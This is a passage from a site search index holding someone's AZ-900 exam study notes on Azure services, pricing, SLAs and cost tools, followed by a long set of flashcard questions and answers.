        During AZ-900 preparation at Microsoft Learn platform, an Azure Cloud Shell is provided.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cli","title":"Azure CLI","text":"

        Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. It runs on Linux, macOS, and Windows, and allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

        It\u2019s an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Launch azure cli:

        # Launch Azure CLI interactive mode from Azure Cloud Shell\naz interactive\n\nversion\nupgrade\nexit\n

        See cheat sheet for Azure CLI.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-powershell","title":"Azure PowerShell","text":"

        Azure PowerShell is a shell with which developers, DevOps, and IT professionals can run commands called command-lets (cmdlets). These commands call the Azure REST API to perform management tasks in Azure.

        In addition to be available via Azure Cloud Shell, you can install and configure Azure PowerShell on Windows, Linux, and Mac platforms.

        See cheat sheet for Azure Powershell.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-arm-and-azure-arm-templates","title":"Azure Resource Manager (ARM) and Azure ARM templates","text":"

        Azure Resource Manager (ARM) is the service used to provision resources in Azure (via the portal, Azure CLI, Terraform, etc.). A resource can be anything you provision inside an Azure subscription. Resources always belong to a Resource Group. Each type of resource (VM, Web App) is provisioned and managed by a Resource Provider (RP). There are close to two hundred RPs within the Azure platform today (and growing with the release of each new service).

        Azure Arc takes the notion of the Resource Provider and extends it to resources outside of Azure. Azure Arc introduces a new Resource Provider (RP) called \u201cHybrid Compute\u201d. The HybridCompute RP is responsible for managing the resources outside of Azure. HybridCompute RP manages the external resources by connecting to the Azure Arc\u00a0agent, deployed to the external VM. Once we deploy the Azure Arc agent to a VM running, for instance, in Google Cloud, it shows inside Azure Portal within the resource group \u201caz_arc_rg\u201d. Since the Google Cloud hosted VM (gcp-vm-001) is an ARM resource, it is an object inside Azure AD. Furthermore, there can be a managed identity associated with Google VM.

        With Azure Resource Manager, you can:

        • Manage your infrastructure through declarative templates rather than scripts. A Resource Manager template is a JSON file that defines what you want to deploy to Azure.
        • Deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
        • Re-deploy your solution throughout the development life-cycle and have confidence your resources are deployed in a consistent state.
        • Define the dependencies between resources, so they're deployed in the correct order.
        • Apply access control to all services because RBAC is natively integrated into the management platform.
        • Apply tags to resources to logically organize all the resources in your subscription.
        • Clarify your organization's billing by viewing costs for a group of resources that share the same tag.

        Infraestructure as code: ARM templates and Bicep are two examples of using infrastructure as code with the Azure Resource Manager to maintain your environment.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates_1","title":"ARM templates","text":"

        By using ARM templates, you can describe the resources you want to use in a declarative JSON format. With an ARM template, the deployment code is verified before any code is run. This ensures that the resources will be created and connected correctly. The template then orchestrates the creation of those resources in parallel. Templates can even execute PowerShell and Bash scripts before or after the resource has been set up.

        Benefits of using ARM templates:

        • Declarative syntax: ARM templates allow you to create and deploy an entire Azure infrastructure declaratively.
        • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
        • Orchestration: You don't have to worry about the complexities of ordering operations and inter dependencies.
        • Modular files: You can break your templates into smaller, reusable components and link them together at deployment time.
        • Extensibility: With deployment scripts, you can add PowerShell or Bash scripts to your templates.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#biceps","title":"Biceps","text":"

        Bicep is a language that uses declarative syntax to deploy Azure resources. A Bicep file defines the infrastructure and configuration. Then, ARM deploys that environment based on your Bicep file. While similar to an ARM template, which is written in JSON, Bicep files tend to use a simpler, more concise style.

        Benefits of using Bicep files:

        • Support for all resource types and API versions: Bicep immediately supports all preview and GA versions for Azure services.
        • Simple syntax: When compared to the equivalent JSON template, Bicep files are more concise and easier to read. Bicep requires no previous knowledge of programming languages.
        • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
        • Orchestration: You don't have to worry about the complexities of ordering operations.
        • Modularity: You can break your Bicep code into manageable parts by using modules.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-arc","title":"Azure Arc","text":"

        Azure Arc is a bridge that extends the Azure platform to help you build applications and services with the flexibility to run across datacenters, at the edge, and in multicloud environments. Develop cloud-native applications with a consistent development, operations, and security model. Azure Arc runs on both new and existing hardware, virtualization and Kubernetes platforms, IoT devices, and integrated systems.

        Azure Arc is not just a \u201csingle-pane\u201d of control for cloud and on-premises. Azure Arc takes Azure\u2019s all-important control plane \u2013 namely, the Azure Resource Manager (ARM) \u2013 and extends it outside of Azure. In order to understand the implication of the last statement, it will help to go over a few ARM terms.

        In utilizing Azure Resource Manager (ARM), Arc lets you extend your Azure compliance and monitoring to your hybrid and multi-cloud configurations. Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform.

        Azure Arc provides a centralized, unified way to:

        • Manage your entire environment together by projecting your existing non-Azure resources into ARM.
        • Manage multi-cloud and hybrid virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
        • Use familiar Azure services and management capabilities, regardless of where they live.
        • Continue using traditional ITOps while introducing DevOps practices to support new cloud and native patterns in your environment.
        • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

        Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

        • Servers
        • Kubernetes clusters
        • Azure data services
        • SQL Server
        • Virtual machines (preview)
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitoring-tools","title":"Azure Monitoring tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor_1","title":"Azure Advisor","text":"

        Azure Advisor evaluates your Azure resources and makes recommendations to help improve reliability, security, and performance, achieve operational excellence, and reduce costs. Azure Advisor is designed to help you save time on cloud optimization. The recommendation service includes suggested actions you can take right away, postpone, or dismiss.

        The recommendations are divided into five categories:

        • Reliability\u00a0is used to ensure and improve the continuity of your business-critical applications.
        • Security\u00a0is used to detect threats and vulnerabilities that might lead to security breaches.
        • Performance\u00a0is used to improve the speed of your applications.
        • Operational Excellence\u00a0is used to help you achieve process and workflow efficiency, resource manageability, and deployment best practices.
        • Cost\u00a0is used to optimize and reduce your overall Azure spending.

        Azure Monitor, Service Health, and Azure Advisor all use actions groups to notify you when an alert has been triggered.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-service-health","title":"Azure Service Health","text":"

        Microsoft Azure provides a global cloud solution to help you manage your infrastructure needs, reach your customers, innovate, and adapt rapidly. Azure Service Health helps you keep track of Azure resource, both your specifically deployed resources and the overall status of Azure. Azure service health does this by combining three different Azure services:

        • Azure Status\u00a0 informs you of service outages in Azure on the Azure Status page. The page is a global view of the health of all Azure services across all Azure regions.
        • Service Health\u00a0provides a narrower view of Azure services and regions. It focuses on the Azure services and regions you're using. This is the best place to look for service impacting communications about outages, planned maintenance activities, and other health advisories because the authenticated Service Health experience knows which services and resources you currently use. You can even set up Service Health alerts to notify you when service issues, planned maintenance, or other changes may affect the Azure services and regions you use.
        • Resource Health\u00a0is a tailored view of your actual Azure resources. It provides information about the health of your individual cloud resources, such as a specific virtual machine instance. It helps to diagnose issues. You can obtain support when an Azure service issue affects your resources.

        By using Azure status, Service health, and Resource health, Azure Service Health gives you a complete view of your Azure environment-all the way from the global status of Azure services and regions down to specific resources.

        Something you initially thought was a simple anomaly that turned into a trend, can readily be reviewed and investigated thanks to the historical alerts.

        Azure Monitor, Service Health, and Azure Advisor all use actions groups to notify you when an alert has been triggered.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor","title":"Azure Monitor","text":"

        Azure Monitor is a platform for collecting data on your resources, analyzing that data, visualizing the information, and even acting on the results. Azure Monitor can monitor Azure resources, your on-premises resources, and even multi-cloud resources like virtual machines hosted with a different cloud provider.

        Azure Monitor, Service Health, and Azure Advisor all use actions groups to notify you when an alert has been triggered.

        As soon as you create an Azure suscription and start deploying resources, Azure Monitor begins collecting data. Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling.

        Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes? Azure monitor

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-log-analytics","title":"Azure Log Analytics","text":"

        Azure Log Analytics is the tool in the Azure portal where you\u2019ll write and run log queries on the data gathered by Azure Monitor. Log Analytics is a robust tool that supports both simple, complex queries, and data analysis. You can write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze the records. You can write an advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend.

        Activity Logs record when resources are created or modified.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor-alerts","title":"Azure Monitor Alerts","text":"

        Azure Monitor Alerts are an automated way to stay informed when Azure Monitor detects a threshold being crossed. You set the alert conditions, the notification actions, and then Azure Monitor Alerts notifies when an alert is triggered. Depending on your configuration, Azure Monitor Alerts can also attempt corrective action.

        Alerts can be set up to monitor the logs and trigger on certain log events, or they can be set to monitor metrics and trigger when certain metrics are crossed. Azure Monitor Alerts use action groups to configure who to notify and what action to take. An action group is simply a collection of notification and action preferences that you associate with one or multiple alerts.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#application-insights","title":"Application Insights","text":"

        Application Insights, an Azure Monitor feature, monitors your web applications. Application Insights is capable of monitoring applications that are running in Azure, on-premises, or in a different cloud environment.

        There are two ways to configure Application Insights to help monitor your application. You can either install an SDK in your application, or you can use the Application Insights agent. The Application Insights agent is supported in C#.NET, VB.NET, Java, JavaScript, Node.js, and Python.

        Once Application Insights is up and running, you can use it to monitor a broad array of information, such as:

        • Request rates, response times, and failure rates
        • Dependency rates, response times, and failure rates, to show whether external services are slowing down performance
        • Page views and load performance reported by users' browsers
        • AJAX calls from web pages, including rates, response times, and failure rates
        • User and session counts
        • Performance counters from Windows or Linux server machines, such as CPU, memory, and network usage
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot","title":"Azure IoT","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-hub","title":"Azure IoT Hub","text":"

        Azure IoT Hub is an Azure-hosted service that functions as a message hub for biderectional communications between the deployed IT devices and the Azure services. You can connect millions of devices and their backend solutions reliably and securely. Almost any device can be connected to an IoT hub.

        Several messaging patterns are supported, including device-to-cloud telemetry, uploading files from devices, and request-reply methods to control your devices from the cloud. IoT Hub also supports monitoring to help you track device creation, device connections, and device failures.

        IoT Hub can further route messages to\u00a0Azure Data Lake Storage.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-central","title":"Azure IoT Central","text":"

        Built on the functios provided by IoT Hub, it provides visualization, control and management features for IoT devices. You can connect devices, view telemetry, view overall device performance, create and manage alerts or even push updates to devices.

        IoT has device templates to facilitate management.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sphere","title":"Azure Sphere","text":"

        Azure Sphere is an integrated IoT solution that consists of three key parts:

        • Azure Sphere micro-controller units (MCUs): hardware component build into the IoT devices that processes the OS and signals from attached sensors.
        • Management software: a custom Linux operating system that manages communication with the security service and runs the vendor's device software.
        • Azure Sphere Security Service (AS3): handles certificate-based device authentication to Azure, ensures that the device has not been compromised, and pushes OS and other software updates to the device as needed.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-artificial-intelligence","title":"Azure Artificial Intelligence","text":"

        AI falls into two broad categories: deep learning and machine learning.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-machine-learning","title":"Azure Machine Learning","text":"

        Collection of Azure services and tools that enable you to use data to train and validate models. It provides multiple services and features such as: Azure Machine Learning Studio, a web portal through which developers ca create no-code and code-first solutions.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cognitive-services","title":"Azure Cognitive Services","text":"

        Azure Cognitive Services provides machine learning models to interact with human and execute cognitive functions that humans would normally do: language, speech, vision, decision.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-bot-service","title":"Azure Bot Service","text":"

        Azure Bot Service enables you to create and use virtual agents to interact with users.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops","title":"Azure DevOps","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops-services","title":"Azure DevOps Services","text":"

        This is not a single but rather a group of services:

        • Azure Artifects
        • Azure Boards
        • Azure Pipelines
        • Azure Repos
        • Azure Test Plans
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#github-and-github-actions","title":"GitHub and GitHub Actions","text":"

        GitHub and GitHub Actions offer many of the same functions as Azure DevOps Services. Generally speaking, GitHub is the appropriate choice for collaborating on open source projects and DevOps is the appropriate choice for enterprise/internal projects.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devtest-labs","title":"Azure DevTest Labs","text":"

        Azure DevTest Labs automates the deployment, configuration, and decommissioning of VMs and other Azure resources.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-for-defense","title":"Azure for defense","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-firewall","title":"Azure Firewall","text":"

        Azure Firewall allows you to centrally create, enforce, and log application and network connectivity policies across subscriptions and virtual networks

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ddos-protection","title":"Azure DDoS Protection","text":"

        Azure DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sentinel","title":"Azure Sentinel","text":"

        SIEM + SOAR

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-pricing-service-level-agreements-and-lifecycle","title":"Azure Pricing, Service Level Agreements, and Lifecycle","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing","title":"Pricing","text":"

        There are free and paid subscriptions:

        • Free trial: 12 months of select free services. Credit of $200 (September 2023) to use any Azure service for 30 days. Services are disabled when time or credit expire. Convertible to paid subscriptions.
        • Pay-as-you-go: typical consumption cloud model.
        • Member offers: Some products or services provide credits toward Azure Services.

        Subscriptions don't enable you to access Azure service per se. For that matter, you need to purchase service through:

        • Enterprise agreement.
        • Web Direct.
        • Cloud Solution Provider (or CSP).

        If you want to raise the limit or quota above the default limit, \"open an online customer support request at no charge\". (Correct)

        Billing zone: Geographical grouping of Azure regions for billing Azure resources.

        Tools: Azure Advisor

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-level-agreements","title":"Service Level Agreements","text":"

        A Service Level Agreement (SLA) is an agreement between a service provider and a consumer that generally guarantees that the SLA-backed service will be available for a specific period during the month. 99% SLA -> 07.20 hours 99.90% SLA -> 00 hours 43.20 minutes 99.95% SLA -> 00 hours 21.60 minutes 99.99% SLA -> 00 hours 04.32 minutes 99.999% SLA ->00 hours 00.00 minutes 25.9 seconds

        A key point: If an Azure service is available but with degraded performance, it still meets the SLA. The service must be completely unavailable to fail the SLA and qualify for a service credit.

        In addition to having different SLA, each Azure resource has also their service credits. Generally, the higher the SLA, the lower the service credit will be.

        SIE is the acronym for Service Impacting Event.

        Composite SLA is the SLA that results from combining services with potentially different SLAs. To determine the composite SLA, you simply multiply the SLA values for each resource.

        Tip for the exam: Deploying instances of a VM across two or more availability zones raises the SLA for the VM from a 99.9% to 99.99% while launching 2 VM instances with a load balancer gives a composite SLA of 9.81%.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-lifecycle-in-azure","title":"Service Lifecycle in Azure","text":"

        Previews allows you to test a pre-release version of your service. Previews have their own terms and conditions. Some of them don't even have customer support at all. Even though you may see a service on a preview, that doesn't mean that is ready for a production environment.

        • Private Preview: Azure feature available to ** certain Azure customers** for evaluation purposes.
        • Public Preview: Azure feature available to all Azure customers for evaluation purposes. Accessible from the Azure Portal.

        Access to preview features at the Azure Portal Preview

        General availability means that the service, application, or feature is available for all Azure customers. In modern lifecycle

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cost-management","title":"Cost Management","text":"

        Three cloud pricing models:

        • Pay-as-you-go: Suitable for development, testing, short-terms projects, businesses that prefer OpEx over CapExp.
        • Reserved instances: commit to a specific VM type and size for a fixed term (1 or 3 years) in exchange for discounted pricing. Suitable for logn-term projects with predictable resource requirements, and businesses looking to optimize costs. Prepaying, cost savings can be significant, up to 70% or more. Reservations do not automatically renew, however and pricing reverts to pay-as-you-go when reservation term expires.
        • Spot pricing: Take advantage of unused Azure capacity at a significant discount. Azure can terminate spot instances at any time. Cost-effective, but no guarantees. Suitable for batch processing, data analysis, and non-critical dev and testing, which are cost-sensitive, but interruptible tasks.
        • Azure Hybrid Benefit: For those who have perpetual licenses of a service and want to move their services to Azure, Azure Hybrid Benefit enables them to repurpose these licenses and gain a corresponding costs savings. BUT it's specific to Windows Server and SQL server, not to all Microsoft licenses that your organization owns.

        The OpEx cost can be impacted by many factors:

        • Resource type: When you provision an Azure resource, Azure creates metered instances for that resource. The meters track the resources' usage and generate a usage record that is used to calculate your bill. Meters: Azure creates automatically usage meters when you deploy a resource, so you can track service usage. Usage captured by each usage meter results in a certain number of billable units, and those billable units are converted to charges based on resource types. One billable unit for a particular service will be different in value from the value of a billable unit for another service.
        • Uptime.
        • Consumption: Pay-as-you-go payment model where you pay for the resources that you use during a billing cycle. Azure also offers the ability to commit to using a set amount of cloud resources. When you reserve capacity, you\u2019re committing to using and paying for a certain amount of Azure resources during a given period (typically one or three years).
        • Geography or resource allocation: The cost of power, labor, taxes, and fees vary depending on the location. Due to these variations, Azure resources can differ in costs to deploy depending on the region.
        • Network Traffic: Bandwidth refers to data moving in and out of Azure datacenters. Some inbound data transfers (data going into Azure datacenters) are free. For outbound data transfers (data leaving Azure datacenters), data transfer pricing is based on zones.
        • Subscription type: Some Azure subscription types also include usage allowances, which affect costs.
        • Azure Marketplace: Azure Marketplace lets you purchase Azure-based solutions and services from third-party vendors. Try to avoid recurring costs associated with an offering from a third provider at Azure Marketplace.

        Additionally it's necessary paying attention to small details such as, for example, every time you provision a VM, additional resources such as storage and networking are also provisioned. If you deprovision the VM, those additional resources may not deprovision at the same time, either intentionally or unintentionally. Maintenance is needed in order adjust cost.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing-calculator","title":"Pricing calculator","text":"

        This service helps you out to choose the best Azure resource for your needs given a budget. With the pricing calculator, you can estimate the cost of any provisioned resources, including compute, storage, and associated network costs. You can even account for different storage options like storage type, access tier, and redundancy.

        https://azure.microsoft.com/en-us/pricing/calculator/

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tco-calculator","title":"TCO calculator","text":"

        Total Cost of Ownership Calculator (TCO calculator) helps you compare the costs for running an on-premises infrastructure compared to an Azure Cloud infrastructure. With the TCO calculator, you enter your current infrastructure configuration, including servers, databases, storage, and outbound network traffic. The TCO calculator then compares the anticipated costs for your current environment with an Azure environment supporting the same infrastructure requirements.

        https://azure.microsoft.com/en-us/pricing/tco/calculator/

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-cost-management-tool-or-azure-cost-management-billing","title":"Microsoft Cost Management tool - or Azure Cost Management + Billing","text":"

        If you accidentally provision new resources, you may not be aware of them until it\u2019s time for your invoice. Cost Management is a service that helps avoid those situations. Cost Management provides the ability to quickly check Azure resource costs, create alerts based on resource spend, and create budgets that can be used to automate management of resources.

        Two key words so far: alerts and budges.

        Cost analysis is a subset of Cost Management that provides a quick visual for your Azure costs. Using cost analysis, you can quickly view the total cost in a variety of different ways, including by billing cycle, region, resource, and so on. A budget is where you set a spending limit for Azure.

        Budgets: You can set budgets based on a subscription, resource group, service type, or other criteria. When you set a budget, you will also set a budget alert.

        Cost alerts provide a single location to quickly check on all of the different alert types that may show up in the Cost Management service. The three types of alerts that may show up are:

        • Budget alerts: Budget alerts support both cost-based and usage-based budgets (Budgets are defined by cost or by consumption usage when using the Azure Consumption API).
        • Credit alerts: Credit alerts are generated automatically at 90% and at 100% of your Azure credit balance. Whenever an alert is generated, it's reflected in cost alerts, and in the email sent to the account owners.
        • Department spending quota alerts: Department spending quota alerts notify you when department spending reaches a fixed threshold of the quota.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#flashcard-questions","title":"Flashcard questions","text":"

        What is Cloud computing?

        The delivery of computing services, such as servers, storage, databases, and networking, over the Internet to provide faster innovation, flexible resources, and economies of scale.

        How does cloud computing lower operating costs?

        By only paying for the cloud services used, rather than the capital expense of buying hardware and setting up on-site datacenters.

        Why do organizations move to the cloud?

        For cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

        What is the advantage of cloud computing's self-service and on-demand nature?

        It allows for vast amounts of computing resources to be provisioned quickly, giving businesses a lot of flexibility and taking the pressure off capacity planning.

        What does \"elastically scaling\" mean in cloud computing?

        Delivering the right amount of IT resources, such as computing power and storage, at the right time and from the right location.

        How does cloud computing improve productivity?

        By removing the need for time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

        How does cloud computing improve performance?

        By running on a worldwide network of secure datacenters that are regularly upgraded to the latest generation of efficient computing hardware, reducing network latency and offering greater economies of scale.

        How does cloud computing improve reliability?

        By making data backup, disaster recovery, and business continuity easier and less expensive through data mirroring at multiple redundant sites on the cloud provider's network.

        How does cloud computing improve security?

        By offering a broad set of policies, technologies, and controls that strengthen the overall security posture, protecting data, apps, and infrastructure from potential threats.

        What is the main advantage of using cloud computing?

        Cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

        What is the biggest difference between cloud computing and traditional IT resources?

        Traditional IT resources required buying hardware and software, setting up and running on-site datacenters, and paying for electricity and IT experts. Cloud computing eliminates these expenses and provides flexible and on-demand resources.

        What are the benefits of cloud computing services?

        Faster innovation, flexible resources, and economies of scale.

        What is the advantage of cloud computing over traditional on-site datacenters?

        Cloud computing eliminates the need for hardware setup, software patching, and other time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

        What is the advantage of cloud computing over a single corporate datacenter?

        Reduced network latency for applications and greater economies of scale.

        What is the main advantage of data backup, disaster recovery, and business continuity in cloud computing?

        It is easier and less expensive.

        What is the main advantage of security in cloud computing?

        Cloud providers offer a broad set of policies, technologies, and controls that strengthen the overall security posture.

        What is the shared responsibility model in cloud computing?

        The shared responsibility model in cloud computing refers to the division of responsibilities between the cloud provider and the customer in terms of security tasks and workloads.

        What are the different types of cloud deployment?

        The different types of cloud deployment are Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and on-premises datacenter.

        In which type of deployment do customers retain the most responsibilities?

        In an on-premises datacenter, customers retain the most responsibilities, as they own the entire stack.

        What responsibilities are always retained by the customer, regardless of the type of deployment?

        The responsibilities retained by the customer regardless of the type of deployment are data, endpoints, account, and access management.

        In a SaaS deployment, which party is responsible for protecting the security of the data?

        In a SaaS deployment, the customer is responsible for protecting the security of the data.

        In a PaaS deployment, who is responsible for managing and maintaining the underlying infrastructure?

        In a PaaS deployment, the cloud provider is responsible for managing and maintaining the underlying infrastructure.

        In an IaaS deployment, who is responsible for managing and maintaining the operating systems and middleware?

        In an IaaS deployment, the customer is responsible for managing and maintaining the operating systems and middleware.

        What are the three broad categories of cloud computing services?

        Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS)

        What are the benefits of migrating your organization's infrastructure to an IaaS solution?

        Migrating to IaaS helps reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. It also gives you the flexibility to scale IT resources up and down with demand and quickly provision new applications.

        Is lift-and-shift migration a common business scenario for using IaaS?

        Yes. Lift-and-shift migration is a common business scenario for using IaaS. It is the fastest and least expensive method of migrating an application or workload to the cloud.

        What is PaaS and how does it differ from IaaS?

        Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. PaaS includes infrastructure such as servers, storage, and networking, but also middleware, development tools, business intelligence services, and more. IaaS only includes infrastructure resources.

        How does PaaS differ from SaaS?

        PaaS provides a complete development and deployment environment in the cloud, including infrastructure, middleware, development tools, and more. SaaS is a type of cloud service where users access software applications over the internet, without the need for installation or maintenance.

        ** How does SaaS work?**

        With SaaS, users connect to the software over the Internet, usually with a web browser. The service provider manages the hardware and software, and with the appropriate service agreement, will ensure the availability and the security of the app and your data.

        What are some common examples of SaaS?

        Common examples of SaaS are email, calendaring, and office tools (such as Microsoft Office 365).

        What are the components of SaaS?

        The components of SaaS include hosted applications/apps, development tools, database management, business analytics, operating systems, servers and storage, networking firewalls/security, and data center physical plant/building.

        ** What are the benefits of using SaaS for an organization?**

        SaaS provides a complete software solution that you purchase on a pay-as-you-go basis from a cloud service provider. It allows your organization to get quickly up and running with an app at minimal upfront cost.

        What is a region in Azure?

        A region in Azure is a geographical area on the planet that contains at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network.

        Why are regions important in Azure?

        Regions are important in Azure because they provide flexibility to bring applications closer to users no matter where they are, global regions provide better scalability and redundancy, and they preserve data residency for services.

        What are some examples of special Azure regions?

        Examples of special Azure regions include US DoD Central, US Gov Virginia, US Gov Iowa, China East, and China North.

        What are availability zones in Azure?

        Availability zones in Azure are created by using one or more datacenters, and there is a minimum of three zones available within a single region.

        What are region pairs in Azure?

        Each Azure region is paired with another region within the same geography (such as US, Europe, or Asia) at least 300 miles away. This allows for the replication of resources across a geography and helps reduce the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

        What are the advantages of region pairs in Azure?

        Region pairs in Azure include automatic geo-redundant storage and prioritization of one region out of every pair in the event of an extensive Azure outage. Planned Azure updates are rolled out to paired regions one region at a time to minimize downtime and risk of application outage.

        What is the purpose of region pairs in Azure?

        The purpose of region pairs in Azure is to provide reliable services and data redundancy by replicating resources across a geography and reducing the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

        What happens if a region in a region pair is affected by a natural disaster in Azure?

        If a region in a region pair is affected by a natural disaster in Azure, services will automatically failover to the other region in its region pair.

        How does Azure provide a high guarantee of availability?

        Azure provides a high guarantee of availability by having a broadly distributed set of datacenters, creating region pairs that are directly connected and far enough apart to be isolated from regional disasters, and offering automatic geo-redundant storage and failover capabilities.

        What is the difference between regions, geographies, and availability zones in Azure?

        In Azure, regions are geographical areas on the planet that contain at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network. Geographies refer to the larger geographical area that a region is located in, such as US, Europe, or Asia. Availability zones are created by using one or more datacenters and there is a minimum of three zones within a single region.

        What is an availability zone?

        Availability zones are physically separate datacenters within an Azure region that are equipped with independent power, cooling, and networking, and are connected through high-speed, private fiber-optic networks.

        What is the purpose of availability zones?

        The purpose of availability zones is to provide high availability for mission-critical applications by creating duplicate hardware environments, in case one goes down.

        How are availability zones connected?

        Availability zones are connected through high-speed, private fiber-optic networks.

        What types of Azure services support availability zones?

        VMs, managed disks, load balancers, and SQL databases support availability zones.

        What are zonal services?

        Zonal services are resources that are pinned to a specific zone, such as VMs, managed disks, and IP addresses.

        What are zone-redundant services?

        Zone-redundant services are services that the platform replicates automatically across zones, such as zone-redundant storage and SQL Database.

        What are non-regional services?

        Non-regional services are services that are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.

        What is a resource in Azure?

        A manageable item that's available through Azure. Virtual machines (VMs), storage accounts, web apps, databases, and virtual networks are examples of resources.

        What is a resource group in Azure?

        A container that holds related resources for an Azure solution. The resource group includes resources that you want to manage as a group.

        What is the purpose of a resource group in Azure?

        The purpose of a resource group is to help manage and organize Azure resources by placing resources of similar usage, type, or location in a resource group.

        Can a resource belong to multiple resource groups in Azure?

        No, a resource can only be a member of a single resource group.

        Can resource groups be nested in Azure?

        No, resource groups can't be nested.

        What happens when a resource group is deleted in Azure?

        When a resource group is deleted, all resources contained within it are also deleted.

        How can resource groups be used for authorization in Azure?

        Resource groups are also a scope for applying role-based access control (RBAC) permissions. By applying RBAC permissions to a resource group, you can ease administration and limit access to allow only what's needed.

        What is the relationship between resources and resource groups in Azure?

        All resources must be in a resource group, and a resource can only be a member of a single resource group.

        What is an Azure subscription?

        An Azure subscription is a logical unit of Azure services that links to an Azure account, which is an identity in Azure Active Directory (Azure AD) or in a directory that Azure AD trusts. It provides authenticated and authorized access to Azure products and services and allows you to provision resources.

        What are the two types of subscription boundaries in Azure?

        The two types of subscription boundaries in Azure are Billing boundary and Access control boundary.

        What happens when you delete a subscription in Azure?

        When you delete a subscription in Azure, all resources contained within it are also deleted.

        What is the purpose of creating a billing profile in Azure?

        The purpose of creating a billing profile in Azure is to have its own monthly invoice and payment method.

